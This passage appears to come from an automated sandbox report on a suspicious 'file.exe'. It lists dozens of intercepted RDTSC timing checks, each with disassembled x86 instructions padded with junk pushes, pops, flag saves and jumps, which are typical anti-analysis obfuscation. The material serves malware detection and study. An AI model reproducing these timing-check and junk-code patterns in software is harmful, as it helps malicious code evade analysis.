                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481003B second address: 481005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F020CB267F6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481005C second address: 4810062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810062 second address: 4810066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810066 second address: 4810086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F020CB28454h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810086 second address: 4810183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov esi, 45DFDCFBh 0x00000012 pushfd 0x00000013 jmp 00007F020CB267F0h 0x00000018 sbb ecx, 08B9A048h 0x0000001e jmp 00007F020CB267EBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 mov cx, 74DBh 0x0000002b mov edi, eax 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F020CB267F6h 0x00000037 add eax, 323045D8h 0x0000003d jmp 00007F020CB267EBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 pushfd 0x00000045 jmp 00007F020CB267F9h 0x0000004a or cx, ED76h 0x0000004f jmp 00007F020CB267F1h 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F020CB267F3h 0x00000060 xor al, FFFFFFAEh 0x00000063 jmp 00007F020CB267F9h 0x00000068 popfd 0x00000069 pushfd 0x0000006a jmp 00007F020CB267F0h 0x0000006f adc esi, 3886CC28h 0x00000075 jmp 00007F020CB267EBh 0x0000007a popfd 0x0000007b popad 0x0000007c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810183 second address: 48101CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F020CB2844Ch 0x00000011 or esi, 070F99B8h 0x00000017 jmp 00007F020CB2844Bh 0x0000001c popfd 0x0000001d mov esi, 4C1FCDEFh 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48101CD second address: 48101D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48101D1 second address: 4810209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 call 00007F020CB28453h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810209 second address: 481025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007F020CB267F9h 0x00000017 or cx, B876h 0x0000001c jmp 00007F020CB267F1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481025D second address: 48102A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f pushfd 0x00000010 jmp 00007F020CB2844Fh 0x00000015 xor si, 4E5Eh 0x0000001a jmp 00007F020CB28459h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48102A8 second address: 481030F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F020CB267F7h 0x00000009 sub ecx, 4E5E286Eh 0x0000000f jmp 00007F020CB267F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F020CB267F0h 0x0000001b sub cl, FFFFFFE8h 0x0000001e jmp 00007F020CB267EBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481030F second address: 4810314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810314 second address: 4810330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267F8h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810330 second address: 4810394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB2844Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F020CB28454h 0x00000012 pushfd 0x00000013 jmp 00007F020CB28452h 0x00000018 sub cx, 7B08h 0x0000001d jmp 00007F020CB2844Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 mov bh, D1h 0x00000026 popad 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a pushad 0x0000002b push ecx 0x0000002c mov bx, 1450h 0x00000030 pop edi 0x00000031 mov al, EEh 0x00000033 popad 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push ebx 0x00000039 pop ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810394 second address: 4810399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810399 second address: 481039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481039F second address: 48103A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48103A3 second address: 48103CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB2844Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F020CB2844Dh 0x00000016 pop eax 0x00000017 mov si, bx 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48103CD second address: 48103EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267F9h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48103EA second address: 4810409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cl, C9h 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810409 second address: 481046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F027F6C49DEh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F020CB267EEh 0x00000016 sub esi, 32437A18h 0x0000001c jmp 00007F020CB267EBh 0x00000021 popfd 0x00000022 jmp 00007F020CB267F8h 0x00000027 popad 0x00000028 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481046B second address: 4810471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810471 second address: 4810495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F027F6C4998h 0x0000000e jmp 00007F020CB267EDh 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810495 second address: 4810499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810499 second address: 481049F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481049F second address: 48104EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28452h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 movsx edi, ax 0x00000013 popad 0x00000014 test edx, 61000000h 0x0000001a jmp 00007F020CB28452h 0x0000001f jne 00007F027F6C65F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F020CB2844Ah 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48104EC second address: 48104F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48104F2 second address: 48104F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48104F8 second address: 4810546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007F020CB267F9h 0x0000001a jmp 00007F020CB267EBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810546 second address: 481056F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F027F6C6596h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F020CB28454h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481056F second address: 481057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800840 second address: 4800850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB2844Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800850 second address: 4800883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, 5CB3h 0x0000000e call 00007F020CB267F8h 0x00000013 mov edx, ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, 7001h 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48009E6 second address: 48009EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48009EC second address: 48009F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48009F2 second address: 4800A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F020CB28457h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800C0C second address: 4800C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267F7h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800C27 second address: 4800C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F020CB2844Ch 0x00000014 add ecx, 23BEB2D8h 0x0000001a jmp 00007F020CB2844Bh 0x0000001f popfd 0x00000020 jmp 00007F020CB28458h 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800C88 second address: 4800C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800C8C second address: 4800C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800C90 second address: 4800C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810CE4 second address: 4810CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ax, D2FBh 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810CEF second address: 4810CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810CF3 second address: 4810D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov ah, 89h 0x0000000c pushfd 0x0000000d jmp 00007F020CB2844Fh 0x00000012 and ecx, 6139DBDEh 0x00000018 jmp 00007F020CB28459h 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810D37 second address: 4810D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810D3B second address: 4810D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810D41 second address: 4810D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810D47 second address: 4810D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488098A second address: 4880990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880990 second address: 48809BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F020CB2844Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48809BB second address: 48809D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48809D7 second address: 48809DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48809DD second address: 48809E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48807B5 second address: 488084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB2844Dh 0x00000008 push eax 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F020CB28458h 0x00000014 pop edx 0x00000015 pushfd 0x00000016 jmp 00007F020CB2844Eh 0x0000001b and cx, B388h 0x00000020 jmp 00007F020CB2844Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F020CB28459h 0x0000002d xchg eax, ebp 0x0000002e jmp 00007F020CB2844Eh 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F020CB28457h 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488084A second address: 4880850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880850 second address: 4880854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880854 second address: 4880872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov edi, 5AA0F1F2h 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48202CD second address: 48202D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48202D3 second address: 482034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, ecx 0x0000000d mov edi, eax 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F020CB267F5h 0x00000018 and eax, 56EB78D6h 0x0000001e jmp 00007F020CB267F1h 0x00000023 popfd 0x00000024 call 00007F020CB267F0h 0x00000029 mov esi, 202F8FD1h 0x0000002e pop eax 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F020CB267F8h 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880BD7 second address: 4880BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880BDD second address: 4880BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880BE1 second address: 4880BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov eax, 1D76EF51h 0x0000000f mov ecx, 35EA2F8Dh 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880BFF second address: 4880C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C14 second address: 4880C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C1A second address: 4880C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C1E second address: 4880C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push ebx 0x0000000c call 00007F020CB28450h 0x00000011 pop ecx 0x00000012 pop edi 0x00000013 pushad 0x00000014 push esi 0x00000015 pop edx 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a popad 0x0000001b push dword ptr [ebp+0Ch] 0x0000001e pushad 0x0000001f movzx eax, dx 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, 2FF1h 0x0000002d pushfd 0x0000002e jmp 00007F020CB2844Eh 0x00000033 sub esi, 47D54AC8h 0x00000039 jmp 00007F020CB2844Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C78 second address: 4880CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push 38513035h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F020CB267F3h 0x00000016 sub esi, 7D51F1BEh 0x0000001c jmp 00007F020CB267F9h 0x00000021 popfd 0x00000022 push esi 0x00000023 jmp 00007F020CB267F7h 0x00000028 pop esi 0x00000029 popad 0x0000002a xor dword ptr [esp], 38503037h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F020CB267F1h 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880CF2 second address: 4880CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880CF6 second address: 4880CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880CFC second address: 4880D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880D3D second address: 4880D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d call 00007F020CB267ECh 0x00000012 mov ax, EC11h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483060C second address: 4830611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830611 second address: 483068A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 69807EE2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d jmp 00007F020CB267F6h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F020CB267EEh 0x0000001c jmp 00007F020CB267F5h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F020CB267F0h 0x00000028 or cx, 8F08h 0x0000002d jmp 00007F020CB267EBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edx 0x0000003a pop esi 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483068A second address: 4830690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830690 second address: 48306A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48306A0 second address: 48306A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
